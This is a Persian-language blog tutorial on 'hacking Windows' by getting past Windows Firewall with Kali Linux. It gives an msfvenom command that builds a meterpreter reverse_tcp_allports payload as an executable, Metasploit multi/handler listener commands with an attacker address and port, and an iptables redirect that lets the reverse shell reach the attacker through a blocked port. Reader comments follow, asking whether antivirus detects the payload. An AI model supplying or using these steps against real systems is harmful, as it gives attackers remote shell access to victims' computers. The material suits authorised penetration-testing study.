قبلا در مورد هک ویندوز با بایپس کردن یا دور زدن Windows Defender حرف زدیم ولی توی این ویدئو خیلی جذاب میخوایم در مورد این حرف بزنیم که چطور بتونیم ویندوز فایروال (Windows Firewall) با کالی لینوکس 2020 رو دور بزنیم امیدوارم بدردتون بخوره…
ویندوز فایروال (Windows Firewall) چیست؟
Windows Firewall یه برنامه تحت ویندوز است که شرکت مایکروسافت ایجاد کرده تا اطلاعاتی را که از اینترنت به سیستم ما می آید را بررسی کند اگه برنامه مضر باشد برنامه را فیلتر میکند.
هک ویندوز با دور زدن Windows Defender (آنتی ویروس) با کالی لینوکس
ویندوز فایروال هنگام استفاده از یک شبکه عمومی همچنین می تواند با جلوگیری از تمام تلاش های ناخواسته برای اتصال به رایانه ، سیستم را ایمن کند.
وظایف ویندوز فایروال عبارت اند از :
- بررسی ترافیک های شبکه
- بستن پورت
- باز کردن پورت
- و…
بایپس کردن یا دور زدن چیست؟
به طور کلی بایپس به معنای این است که به جای اینکه از یه چیزی بگزریم از طریق یه راه دیگری اون چیز رو دور بزنیم در هک بایپس یا دوز زدن نوعی نقص در یک سیستم امنیتی است که به مهاجم اجازه می دهد مکانیسم های امنیتی را برای دستیابی به سیستم یا شبکه دور بزند.
هک ویندوز با دور زدن ویندوز فایروال کالی لینوکس 2020 :
خوب تا الان با دو مفهوم ویندوز فایروال و بایپس یا دور زدن چیست؟ آشنا شدین حالا بریم سراغ اینکه چطور بتونیم windows firewall رو بایپس کنیم من اینجا به صورت خلاصه میخوام توضیح بدم.
اولین قسمت شما باید پیلود خودتون رو ایجاد کنین این دفعه میخوایم از حالت reverse_tcp_allports استفاده میکنیم :
1 |
msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=MYHOST lport=MYPORT -f exe > reverse_shell.exe |
بعد از ایجاد وارد Msfconsole خودتون بشین این دستورات رو وارد بکنین :
1 2 3 4 5 |
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports msf exploit(multi/handler) > set lhost 192.168.1.139 msf exploit(multi/handler) > set lport 4444 msf exploit(multi/handler) > run |
حالا بچه ها ما پیلود رو ایجاد کردیم دستورات برای دسترسی رو هم زدیم الان باید بریم وارد سیستم victim بشیم اونجا وارد control panel میشیم بعد از قسمت system and security وارد قسمت windows firewall میشیم بعد روی Advanced Settings کلیک میکنیم.
مشاهده میکنین که دو قسمت inbound rules و outbound rules ما با قسمت outbound rules کار داریم چرا ؟ چون میخوایم ترافیکی که از طریق پورت مورد نظر از داخل شبکه به سمت سرور ارسال میشه رو بلاک بکنیم. هک ویندوز با کالی لینوکس 2020
روش کلیک میکنیم از قسمت سمت راست گزینه new rules رو کلیک میکنیم بعد حالت رو قسمت port قرار میدیم روی next کلیک میکنیم
وارد قسمتی میشیم که باید پورت مورد نظر برای بلاک کردن رو وارد کنیم.
بعد از وارد کردن next رو میزنیم توی این قسمت گزینه Block the connection رو انتخاب میکنیم بعد next
بعد وارد قسمت میشیم که باید یه اسم برای rules انتخاب و در اخر finish
خوب دیگه بچه ها الان پورت رو بستیم الان روی پیلود اگه کلیک کنم هیچ session در کالی ایجاد نمیشه چون ترافیک پورت رو بلاک کردیم حالا میخوایم دورش بزنیم پس وارد کالی میشیم و دستور زیر رو وارد میکنیم :
1 |
iptables -A PREROUTING -t nat -p tcp --dport 4444:5556 -j REDIRECT –to-port 4444 |
اینجا اومدیم یه iptable تعریف کردیم که تمام ترافیکی که به پورت 4444-5556 ارسال میهش رو به پورت 4444 تغییر مسیر بده بنابراین وقتی پوسته معکوس سعی کند به پورت 5556 به سیستم ما متصل شود ، به پورت 4444 تغییر مسیر می یابد. هک ویندوز با دور زدن ویندوز فایروال
منبع : https://www.webopedia.com/ و https://www.hackingarticles.in/
سلام
خسته نباشید
آیا توی این روش آنتی ویروس پیلود شناسایی نمی کنه؟؟
11
سلام سلامت باشین مکانیزم های امنیتی هر روز داره بروز میشه این روش شاید تا دیروز جواب میداده ولی الان نه دلایل خاصی داره که ویدئویی کامل توضیح خواهیم داد
2